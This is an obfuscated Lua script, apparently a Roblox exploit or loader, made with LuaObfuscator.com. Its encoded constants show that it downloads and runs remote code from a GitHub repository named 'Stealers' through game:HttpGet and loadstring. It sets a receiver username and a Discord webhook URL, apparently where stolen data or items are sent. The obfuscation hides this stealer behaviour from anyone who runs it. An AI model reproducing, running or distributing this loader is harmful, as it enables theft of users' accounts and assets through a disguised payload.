--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v99=0;local v100;while true do if (v99==1) then return v100;end if (v99==0) then v100=v5(v83,v19);v19=nil;v99=1;end end else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/(2^(v32-(2 -1))))%((929 -(214 + 713))^(((v33-(2 -1)) -(v32-((1066 -(68 + 997)) + 0))) + (1 -0))) ;return v84-(v84%(2 -1)) ;else local v85=((1891 -(226 + 1044)) -(555 + 64))^(v32-1) ;return (((v31%(v85 + v85))>=v85) and (1 + (0 -0))) or (931 -((974 -(32 + 85)) + 74)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (57 + 199)) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (959 -(892 + (118 -53))) );v18=v18 + (4 -2) ;v35=(351 -(87 + 263)) -0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * ((1969 -(802 + 150)) -(2048 -1287))) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 1)) then v47=v20(v44,(1929 -(1789 + 124)) + 5 ,(1794 -(745 + 21)) -(915 + 82) );v48=((v20(v44,(31 + 59) -58 )==((2126 -1353) -(201 + 571))) and  -(1 + 0)) or (1 -0) ;v42=(4667 -3477) -(1069 + 118) ;end if (v42==(6 -3)) then if (v47==(0 -0)) then if (v46==(859 -(814 + 45))) then return v48 * (0 + 0 + 0) ;else v47=1 -0 ;v45=0 + 0 ;end elseif (v47==2047) then return ((v46==(885 -(261 + 624))) and (v48 * ((1 + 0)/(791 -(368 + 423))))) or (v48 * NaN) ;end return v8(v48,v47-(3214 -2191) ) * (v45 + (v46/((1082 -(1020 + 60))^(70 -(10 + 8))))) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=443 -(416 + 26) ;end if (v42==(3 -2)) then v45=1 + 0 ;v46=(v20(v44,1 -0 ,7 + 1 + 12 ) * ((440 -(145 + 293))^(462 -((1099 -(87 + 968)) + 386)))) + v43 ;v42=1749 -(760 + 987) ;end end end local function v25(v49) local v50;if  not v49 then local v86=0 -0 ;while true do if (v86==(0 + 0)) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1414 -(447 + 966)) );v18=v18 + v49 ;local v51={};for v65=(1819 -(1703 + 114)) -(702 -(376 + 325)) , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 888 -(117 + 771) ;end)();while true do if (v67~=(403 -(108 + 294))) then else if (v52~=2) then else for v101= #".",v23() do local v102=(function() return 1489 -(570 + 919) ;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v102==1) then while true do if (v103~=0) then else v104=(function() return v21();end)();if (v20(v104, #",", #"<")==0) then local v131=(function() return 0 -0 ;end)();local v132=(function() return;end)();local v133=(function() return;end)();local v134=(function() return;end)();local v135=(function() return;end)();while true do if (v131==(811 -(569 + 242))) then v132=(function() return 0;end)();v133=(function() return nil;end)();v131=(function() return 2 -1 ;end)();end if (v131==1) then v134=(function() return nil;end)();v135=(function() return nil;end)();v131=(function() return 1 + 1 ;end)();end if (v131==(1026 -(706 + 318))) then while true do if (v132== #"gha") then if (v20(v134, #"nil", #"xnx")== #":") then v135[ #".com"]=(function() return v58[v135[ #".com"]];end)();end v53[v101]=(function() return v135;end)();break;end if (v132== #"/") then local v180=(function() return 1251 -(721 + 530) ;end)();while true do if (v180==0) then v135=(function() return {v22(),v22(),nil,nil};end)();if (v133==0) then local v186=(function() return 1271 -(945 + 326) ;end)();local v187=(function() return;end)();while true do if ((0 -0)==v186) then v187=(function() return 0;end)();while true do if (v187~=(0 + 0)) then else v135[ #"-19"]=(function() return v22();end)();v135[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v133== #"[") then v135[ #"xnx"]=(function() return v23();end)();elseif (v133==2) then v135[ #"gha"]=(function() return v23() -(2^16) ;end)();elseif (v133~= #"gha") then else local v194=(function() return 700 -(271 + 429) ;end)();local v195=(function() return;end)();while true do if ((0 + 0)~=v194) then else v195=(function() return 1500 -(1408 + 92) ;end)();while true do if (v195~=(1086 -(461 + 625))) then else v135[ #"xnx"]=(function() return v23() -((1290 -(993 + 295))^(1 + 15)) ;end)();v135[ #"0313"]=(function() return v22();end)();break;end end break;end end end v180=(function() return 1;end)();end if (v180==1) then v132=(function() return 2;end)();break;end end end if (v132~=2) then else local v181=(function() return 1171 -(418 + 753) ;end)();local v182=(function() return;end)();while true do if (v181==(0 + 0)) then v182=(function() return 0 + 0 ;end)();while true do if (v182~=(1 + 0)) then else v132=(function() return  #"-19";end)();break;end if (v182==0) then if (v20(v134, #",", #".")== #".") then v135[1 + 1 ]=(function() return v58[v135[531 -(406 + 123) ]];end)();end if (v20(v134,1771 -(1749 + 20) ,1 + 1 )== #":") then v135[ #"91("]=(function() return v58[v135[ #"nil"]];end)();end v182=(function() return 1;end)();end end break;end end end if (v132~=0) then else local v183=(function() return 1322 -(1249 + 73) ;end)();local v184=(function() return;end)();while true do if (v183==0) then v184=(function() return 0;end)();while true do if (v184==1) then v132=(function() return  #"[";end)();break;end if (v184~=0) then else v133=(function() return v20(v104,1 + 1 , #"-19");end)();v134=(function() return v20(v104, #"asd1",6);end)();v184=(function() return 1146 -(466 + 679) ;end)();end end break;end end end end break;end end end break;end end break;end if (v102==(0 -0)) then local v107=(function() return 0;end)();local v108=(function() return;end)();while true do if (v107==0) then v108=(function() return 0 -0 ;end)();while true do if (v108~=(1901 -(106 + 1794))) then else v102=(function() return 1 + 0 ;end)();break;end if (v108==0) then v103=(function() return 0 + 0 ;end)();v104=(function() return nil;end)();v108=(function() return 1;end)();end end break;end end end end end for v105= #"]",v23() do v54[v105-#"|" ]=(function() return v28();end)();end return v56;end break;end if (v67~=(0 -0)) then else if (v52== #"[") then local v95=(function() return 0;end)();local v96=(function() return;end)();while true do if ((0 -0)==v95) then v96=(function() return 114 -(4 + 110) ;end)();while true do if (v96==(585 -(57 + 527))) then for v110= #"[",v57 do local v111=(function() return 1427 -(41 + 1386) ;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (v111==(103 -(17 + 86))) then local v155=(function() return 0 + 0 ;end)();local v156=(function() return;end)();while true do if (v155~=(0 -0)) then else v156=(function() return 0;end)();while true do if (v156==(0 -0)) then v112=(function() return 0;end)();v113=(function() return nil;end)();v156=(function() return 1;end)();end if (v156==1) then v111=(function() return 167 -(122 + 44) ;end)();break;end end break;end end end if (v111==1) then v114=(function() return nil;end)();while true do if (v112== #"{") then if (v113== #"/") then v114=(function() return v21()~=0 ;end)();elseif (v113==2) then v114=(function() return v24();end)();elseif (v113~= #"-19") then else v114=(function() return v25();end)();end v58[v110]=(function() return v114;end)();break;end if (v112==(0 -0)) then local v171=(function() return 0 -0 ;end)();local v172=(function() return;end)();while true do if (v171==(0 + 0)) then v172=(function() return 0;end)();while true do if (v172~=1) then else v112=(function() return  #">";end)();break;end if (v172~=(0 + 0)) then else v113=(function() return v21();end)();v114=(function() return nil;end)();v172=(function() return 1;end)();end end break;end end end end break;end end end v56[ #"91("]=(function() return v21();end)();v96=(function() return 2;end)();end if (v96==(0 -0)) then v57=(function() return v23();end)();v58=(function() return {};end)();v96=(function() return 1;end)();end if (v96~=2) then else v52=(function() return 2;end)();break;end end break;end end end if (v52==(65 -(30 + 35))) then local v97=(function() return 0;end)();local v98=(function() return;end)();while true do if (v97~=(0 + 0)) then else v98=(function() return 0;end)();while true do if (v98==1) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v98=(function() return 7 -5 ;end)();end if (v98~=0) then else v53=(function() return {};end)();v54=(function() return {};end)();v98=(function() return 1213 -(323 + 889) ;end)();end if (v98==2) then v52=(function() return  #"}";end)();break;end end break;end end end v67=(function() return 1;end)();end end end end local function v29(v59,v60,v61) local v62=v59[2 -1 ];local v63=v59[582 -((983 -622) + (463 -244)) ];local v64=v59[323 -(53 + 267) ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1 + 0 ;local v73= -(414 -(15 + 398));local v74={};local v75={...};local v76=v12("#",...) -(3 -2) ;local v77={};local v78={};for v87=(0 -0) + 0 ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 + (1125 -(936 + 189)) ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=850 -(20 + 830) ;while true do if ((v88==(0 + 0)) or (669==4223)) then v80=v68[v72];v81=v80[127 -(116 + 10) ];v88=1 + 0 ;end if (v88==(739 -(542 + 196))) then if (v81<=(18 -9)) then if (v81<=(2 + (5 -3))) then if (v81<=(1 + 0)) then if ((v81>((1227 -(322 + 905)) + 0)) or (1692<588)) then do return;end else v72=v80[3];end elseif (v81<=2) then v78[v80[2]]();elseif (v81>((618 -(602 + 9)) -4)) then v61[v80[7 -4 ]]=v78[v80[1553 -((2315 -(449 + 740)) + 425) ]];else local v138=0;local v139;local v140;local v141;local v142;while true do if (v138==(406 -(118 + 287))) then v73=(v141 + v139) -(3 -2) ;v142=1121 -(118 + 1003) ;v138=5 -3 ;end if ((v138==(379 -(142 + 235))) or (4797<3651)) then for v173=v139,v73 do v142=v142 + (4 -3) ;v78[v173]=v140[v142];end break;end if (v138==(0 + 0)) then v139=v80[979 -(553 + 424) ];v140,v141=v71(v78[v139](v13(v78,v139 + ((1 + 0) -0) ,v80[3 + 0 ])));v138=(1614 -(1565 + 48)) + 0 ;end end end elseif ((v81<=(4 + (874 -(826 + 46)))) or (4177>4850)) then if (v81==(2 + 1 + 2)) then v72=v80[2 + 1 ];else local v117=v80[4 -2 ];v78[v117]=v78[v117](v13(v78,v117 + (2 -1) ,v73));end elseif ((v81<=(15 -(1146 -(782 + 356)))) or (400>1111)) then v78[v80[1 + (948 -(245 + 702)) ]]=v80[14 -11 ];elseif (v81>8) then local v143=v80[(1022 -(176 + 91)) -(239 + 514) ];v78[v143]=v78[v143](v13(v78,v143 + 1 ,v73));else v78[v80[2]]=v80[(6 -4) + 1 ];end elseif ((3051>1005) and (v81<=(1343 -((2076 -1279) + (783 -251))))) then if (v81<=11) then if (v81>(8 + 2)) then local v121=1092 -(975 + 117) ;local v122;local v123;while true do if (v121==1) then v78[v122 + 1 ]=v123;v78[v122]=v123[v80[4]];break;end if (v121==(0 + 0)) then v122=v80[4 -(1 + 1) ];v123=v78[v80[1205 -(373 + 829) ]];v121=732 -(476 + 255) ;end end elseif (v78[v80[1132 -(369 + 761) ]]==v80[4]) then v72=v72 + 1 + 0 ;else v72=v80[5 -2 ];end elseif ((3693<=4382) and (v81<=((1920 -(260 + 1638)) -10))) then v78[v80[2]]();elseif (v81>(251 -(64 + 174))) then local v148=0 + 0 ;local v149;local v150;local v151;local v152;while true do if ((1 -0)==v148) then v73=(v151 + v149) -(337 -(144 + 192)) ;v152=0;v148=218 -(42 + 174) ;end if (v148==(2 + 0)) then for v176=v149,v73 do v152=v152 + 1 + 0 ;v78[v176]=v150[v152];end break;end if (v148==(0 + 0)) then v149=v80[2];v150,v151=v71(v78[v149](v13(v78,v149 + (1505 -(363 + 1141)) ,v80[3])));v148=1;end end elseif (v78[v80[1582 -(1183 + 397) ]]==v80[11 -7 ]) then v72=v72 + 1 + 0 ;else v72=v80[3 + 0 ];end elseif (v81<=((2431 -(382 + 58)) -(1913 + 62))) then if (v81==(10 + 5)) then local v124=(0 -0) -(0 + 0) ;local v125;local v126;while true do if ((v124==(1933 -(565 + 1368))) or (3282>4100)) then v125=v80[2];v126=v78[v80[3]];v124=(5 -2) -2 ;end if ((v124==(1662 -((3352 -(157 + 1718)) + 150 + 34))) or (3580<2844)) then v78[v125 + (1 -0) ]=v126;v78[v125]=v126[v80[4 + (0 -0) ]];break;end end else v78[v80[2]]=v61[v80[859 -((1769 -(902 + 303)) + 292) ]];end elseif (v81<=((102 -73) -12)) then v78[v80[5 -3 ]]=v61[v80[307 -(244 + 60) ]];elseif ((89<4490) and (v81>((47 -33) + 4))) then do return;end else v61[v80[3]]=v78[v80[478 -((98 -57) + 435) ]];end v72=v72 + (1002 -((1956 -(697 + 321)) + 63)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574033D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F457A6A712F537465616C6572732F6D61696E2F6C6F73672E6C756103083Q005265636569766572030B3Q004A61636F626D616E38323503073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31323937352Q36382Q3739322Q3435383531372F70546B327072536D4A6C6F386E36326233532Q4459672Q507A4E69476C6B6E5331626E2Q6B3974346B583062345F54656F7130456D6862585331436D796E694377395F4300143Q0012083Q00013Q00260A3Q000B0001000200044Q000B0001001211000100033Q001211000200043Q00200B000200020005001208000400064Q0003000200044Q000900013Q00022Q000C00010001000100044Q0013000100260A3Q00010001000100044Q00010001001208000100083Q002Q12000100073Q0012080001000A3Q002Q12000100093Q0012083Q00023Q00044Q000100012Q00133Q00017Q00",v9(),...);